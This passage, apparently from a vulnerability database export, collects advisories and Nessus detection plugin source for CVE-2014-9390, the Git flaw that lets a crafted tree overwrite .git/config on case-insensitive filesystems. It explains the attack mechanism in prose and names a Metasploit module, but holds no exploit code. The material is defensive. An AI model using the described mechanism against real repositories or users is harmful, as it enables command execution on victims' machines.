rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2020-02-26T14:40:10", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "edition": 2, "description": "\nThe Git Project reports:\n\nWhen using a case-insensitive filesystem an attacker can\n\t craft a malicious Git tree that will cause Git to overwrite\n\t its own .git/config file when cloning or checking out a\n\t repository, leading to arbitrary command execution in 
the\n\t client machine. If you are a hosting service whose users\n\t may fetch from your service to Windows or Mac OS X machines,\n\t you are strongly encouraged to update to protect such users\n\t who use existing versions of Git.\n\n", "modified": "2014-12-19T00:00:00", "published": "2014-12-19T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/1d567278-87a5-11e4-879c-000c292ee6b8.html", "id": "1D567278-87A5-11E4-879C-000C292EE6B8", "title": "git -- Arbitrary command execution on case-insensitive filesystems", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:56", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "### Background\n\nGit is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. \n\n### Description\n\nA vulnerability in Git causing Git-compatible clients that access case-insensitive or case-normalizing filesystems to overwrite the .git/config when cloning or checking out a repository, leading to execution of arbitrary commands. \n\n### Impact\n\nAn attacker can execute arbitrary commands on a client machine that clones a crafted malicious Git tree. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Git 1.8.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-1.8.5.6\"\n \n\nAll Git 1.9.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-1.9.5\"\n \n\nAll Git 2.0.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-2.0.5\"", "edition": 1, "modified": "2015-09-24T00:00:00", "published": "2015-09-24T00:00:00", "id": "GLSA-201509-06", "href": "https://security.gentoo.org/glsa/201509-06", "type": "gentoo", "title": "Git: Arbitrary command execution", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-07T12:54:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9462", "CVE-2016-3068", "CVE-2014-9390", "CVE-2016-3069", "CVE-2016-3630", "CVE-2016-3105"], "edition": 1, "description": "### Background\n\nMercurial is a distributed source control management system.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll mercurial users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/mercurial-3.8.4\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-19", "id": "GLSA-201612-19", "type": "gentoo", "title": "Mercurial: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "A pure Java implementation of the Git version control system. ", "modified": "2014-12-29T10:06:12", "published": "2014-12-29T10:06:12", "id": "FEDORA:38F0860CEEC1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: eclipse-jgit-3.5.3-1.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "The eclipse-egit package contains Eclipse plugins for interacting with Git repositories. ", "modified": "2014-12-29T10:06:12", "published": "2014-12-29T10:06:12", "id": "FEDORA:4F11F60CEEC6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: eclipse-egit-3.5.3-1.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-23T18:54:54", "description": "Matt Mackall and Augie Fackler discovered that Git incorrectly handled\ncertain filesystem paths. A remote attacker could possibly use this\nissue to execute arbitrary code if the Git tree is stored in an HFS+\nor NTFS filesystem. The remote attacker would need write access to a\nGit repository that the victim pulls from.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-01-14T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : git vulnerability (USN-2470-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-01-14T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:git", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2470-1.NASL", "href": "https://www.tenable.com/plugins/nessus/80517", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2470-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80517);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n script_xref(name:\"USN\", value:\"2470-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : git vulnerability (USN-2470-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matt Mackall and Augie Fackler discovered that Git incorrectly handled\ncertain filesystem paths. A remote attacker could possibly use this\nissue to execute arbitrary code if the Git tree is stored in an HFS+\nor NTFS filesystem. 
The remote attacker would need write access to a\nGit repository that the victim pulls from.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2470-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"git\", pkgver:\"1:1.7.9.5-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"git\", pkgver:\"1:1.9.1-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"git\", pkgver:\"1:2.1.0-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T11:12:24", "description": "libgit2 was updated to fix an arbitrary command execution\nvulnerability on case-insentitive file systems.\n\nThe following vulnerability was fixed :\n\n - When using programs using libgit2 on case-insensitive\n filesystems, .git/config could be overwritten, which\n allowed execution of arbitrary commands (boo#925040,\n CVE-2014-9390).\n\nThe configuration is uncommon as all default file systems on openSUSE\nare case sensitive.\n\nAdditionally, on openSUSE 13.2 libgit2 was updated to version 0.21.5\nto backport further critical fixes.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-04-08T00:00:00", "title": "openSUSE Security Update : libgit2 (openSUSE-2015-288)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-04-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-0-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-0", "cpe:/o:novell:opensuse:13.2", 
"p-cpe:/a:novell:opensuse:libgit2-21-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:libgit2-21"], "id": "OPENSUSE-2015-288.NASL", "href": "https://www.tenable.com/plugins/nessus/82634", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82634);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-9390\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2015-288)\");\n script_summary(english:\"Check for the openSUSE-2015-288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libgit2 was updated to fix an arbitrary command execution\nvulnerability on case-insentitive file systems.\n\nThe following vulnerability was fixed :\n\n - When using programs using libgit2 on case-insensitive\n filesystems, .git/config could be overwritten, which\n allowed execution of arbitrary commands (boo#925040,\n CVE-2014-9390).\n\nThe configuration is uncommon as all default file systems on openSUSE\nare case sensitive.\n\nAdditionally, on openSUSE 13.2 libgit2 was updated to version 0.21.5\nto backport further critical fixes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=925040\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-21-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-0-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-0-debuginfo-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-debugsource-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-devel-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-21-0.21.5-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-21-debuginfo-0.21.5-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-debugsource-0.21.5-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-devel-0.21.5-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-0 / 
libgit2-0-debuginfo / libgit2-debugsource / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-07-15T04:06:39", "description": "The remote Mac OS X host has a version of Apple Xcode prior to 6.2 beta 3. It is, therefore, affected by a remote command execution vulnerability when processing git trees in a case-insensitive or case-normalizing file system. A remote attacker, using a specially crafted git tree, can overwrite a user's '.git/config' file when the user clones or checks out a repository, allowing arbitrary command execution.\n\nThis plugin has been deprecated. It detects Xcode installations vulnerable to CVE-2014-9390, and was created before Apple released a security update to fix this vulnerability. On March 9, 2015, a security update for Xcode has been released. The update fixes multiple vulnerabilities (including CVE-2014-9390). A separate plugin (ID 81758) has been created to detect that update. That plugin should be used instead of this one.", "edition": 3, "published": "2015-01-19T00:00:00", "title": "Apple Xcode < 6.2 beta 3 .git/config Command Execution (Mac OS X) (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:apple:xcode"], "id": "MACOSX_XCODE_GIT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80828);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-12-18-1\");\n\n script_name(english:\"Apple Xcode < 6.2 beta 3 .git/config Command Execution (Mac OS X) (deprecated)\");\n script_summary(english:\"Checks the version of Xcode.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"This plugin 
has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Apple Xcode prior to 6.2\nbeta 3. It is, therefore, affected by a remote command execution\nvulnerability when processing git trees in a case-insensitive or\ncase-normalizing file system. A remote attacker, using a specially\ncrafted git tree, can overwrite a user's '.git/config' file when the\nuser clones or checks out a repository, allowing arbitrary command\nexecution.\n\nThis plugin has been deprecated. It detects Xcode installations\nvulnerable to CVE-2014-9390, and was created before Apple released a\nsecurity update to fix this vulnerability. On March 9, 2015, a\nsecurity update for Xcode has been released. The update fixes\nmultiple vulnerabilities (including CVE-2014-9390). A separate plugin\n(ID 81758) has been created to detect that update. That plugin should\nbe used instead of this one.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/en-us/HT204147\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.linux.kernel/1853266\");\n # http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afc47628\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:xcode\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_xcode_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Apple Xcode\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus plugin ID 81758 instead.');\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_HOST_NOT, \"running Mac OS X\");\n# Patch is only available for OS X 10.9.4 and later\nif (ereg(pattern:\"Mac OS X ([0-9]|10\\.[0-8]|10\\.9\\.[0-3])([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9.4 or above\");\n\nappname = \"Apple Xcode\";\nappbeta = \"Apple Xcode-Beta\";\n\nvuln = FALSE;\n\ncount = get_install_count(app_name:appname);\nif (count != 0)\n{\n installs = get_installs(app_name:appname);\n foreach install (installs[1])\n {\n path = install[\"path\"];\n ver = install[\"version\"];\n\n #6.1.1 is the current maximum Xcode affected\n #check to see if a vulnerable version of Xcode is installed\n if (ver_compare(ver:ver, fix:'6.1.1', strict:FALSE) <= 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n';\n vuln = TRUE;\n }\n }\n}\n\ncount = 
get_install_count(app_name:appbeta);\nif (count != 0)\n{\n installs = get_installs(app_name:appbeta);\n foreach install (installs[1])\n {\n path = install[\"path\"];\n ver = install[\"version\"];\n\n if(ver_compare(ver:ver, fix:'6.2', strict:FALSE) < 0)\n {\n report +=\n '\\n Beta path : ' + path +\n '\\n Installed Beta version : ' + ver +\n '\\n';\n vuln = TRUE;\n }\n }\n}\n\nif (vuln)\n{\n if (report_verbosity > 0)\n security_warning(port:0, extra:report);\n else security_warning(port:0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname+'(-Beta)');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-01T03:45:36", "description": "Updated git packages fix security vulnerability :\n\nIt was reported that git, when used as a client on a case-insensitive\nfilesystem, could allow the overwrite of the .git/config file when the\nclient performed a git pull. Because git permitted committing\n.Git/config (or any case variation), on the pull this would replace\nthe user's .git/config. 
If this malicious config file contained\ndefined external commands (such as for invoking and editor or an\nexternal diff utility) it could allow for the execution of arbitrary\ncode with the privileges of the user running the git client\n(CVE-2014-9390).", "edition": 23, "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : git (MDVSA-2015:169)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:gitview", "p-cpe:/a:mandriva:linux:git-core", "p-cpe:/a:mandriva:linux:git-core-oldies", "p-cpe:/a:mandriva:linux:git-arch", "cpe:/o:mandriva:business_server:2", "p-cpe:/a:mandriva:linux:git", "p-cpe:/a:mandriva:linux:perl-Git", "p-cpe:/a:mandriva:linux:gitk", "p-cpe:/a:mandriva:linux:git-email", "p-cpe:/a:mandriva:linux:git-svn", "p-cpe:/a:mandriva:linux:lib64git-devel", "p-cpe:/a:mandriva:linux:gitweb", "p-cpe:/a:mandriva:linux:git-cvs", "p-cpe:/a:mandriva:linux:git-prompt"], "id": "MANDRIVA_MDVSA-2015-169.NASL", "href": "https://www.tenable.com/plugins/nessus/82422", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:169. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82422);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/08/02 13:32:57\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_xref(name:\"MDVSA\", value:\"2015:169\");\n\n script_name(english:\"Mandriva Linux Security Advisory : git (MDVSA-2015:169)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated git packages fix security vulnerability :\n\nIt was reported that git, when used as a client on a case-insensitive\nfilesystem, could allow the overwrite of the .git/config file when the\nclient performed a git pull. Because git permitted committing\n.Git/config (or any case variation), on the pull this would replace\nthe user's .git/config. 
If this malicious config file contained\ndefined external commands (such as for invoking and editor or an\nexternal diff utility) it could allow for the execution of arbitrary\ncode with the privileges of the user running the git client\n(CVE-2014-9390).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0546.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-core-oldies\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-prompt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gitview\");\n script_set_attribute(attribute:\"cpe\", 
